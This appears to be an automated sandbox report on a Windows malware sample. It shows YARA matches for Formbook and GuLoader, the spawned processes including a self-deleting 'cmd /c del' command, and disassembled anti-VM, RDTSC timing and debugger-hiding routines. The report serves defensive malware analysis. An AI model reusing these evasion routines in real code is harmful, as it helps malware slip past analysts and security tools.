    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
    Source: 2eD17GZuWs.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 2eD17GZuWs.exeVirustotal: Detection: 25%
    Source: unknownProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: Binary string: msiexec.pdb source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp
    Source: Binary string: msiexec.pdbGCTL source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: 2eD17GZuWs.exe, 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, msiexec.exe, 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: 2eD17GZuWs.exe, msiexec.exe
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Yara detected VB6 Downloader Generic
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040984F push ecx; retf
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00409D50 push edi; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00409D55 push edi; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406910 pushad ; iretd
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004069F5 push EF15CAC2h; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040759B push FFFFFFC6h; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406653 pushad ; iretd
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406A98 pushfd ; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004082AF push FFFFFFDAh; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040A3DA push ecx; retf
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00407FAA push esp; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00407FB3 push ecx; retf
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E19D0D1 push ecx; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0512D0D1 push ecx; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_011169BB push esi; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0110AB07 push ds; retf
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CF5C push eax; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01114E05 push ss; retf
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEA5 push eax; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEF2 push eax; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEFB push eax; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Detected RDTSC dummy instruction sequence (likely for instruction hammering)
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Tries to detect Any.run
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: 2eD17GZuWs.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F13 second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA87CD1247Ch 0x0000001c call 00007FA87CD1244Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4FA0 second address: 00000000021D4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CD1284Dh 0x0000001f popad 0x00000020 call 00007FA87CD12521h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 0000000000564FA0 second address: 0000000000564FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CCF94CDh 0x0000001f popad 0x00000020 call 00007FA87CCF91A1h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000011098E4 second address: 00000000011098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000001109B4E second address: 0000000001109B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B rdtsc
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: explorer.exe, 0000000A.00000000.896175080.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000000.894315754.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 2eD17GZuWs.exe, 00000001.00000003.927010291.0000000000948000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 0000000A.00000002.940809736.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
    Source: 2eD17GZuWs.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information queried: ProcessInformation

    Anti Debugging:

    Contains functionality to hide a thread from the debugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D06B1 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess queried: DebugPort
    Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D3746 LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D54F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1E09 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1721 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1C16 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D4802 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D4CBB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5531 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D29C8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E178E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FFE3F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201608 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14E620 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15766D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DFE87 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C46A7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1736CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FFEC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E188EC7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218ED6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1716E0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1576E2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16F716 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A70E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17E730 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21070D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E144F2E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218F6A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15EF40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15FF60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E158794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C7794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1837F5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21740D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17BC2C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DC450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DC450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A44B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16746D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15849B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2014FB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218CD6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20E539 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14AD30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1CA537 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E167D50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E183D43 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C3540 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1F3D40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C577 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C577 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FD9B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FD9B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2105AC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2105AC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1735A1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1F8DF1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15D5E0 mov eax, dword ptr fs:[00000030h]
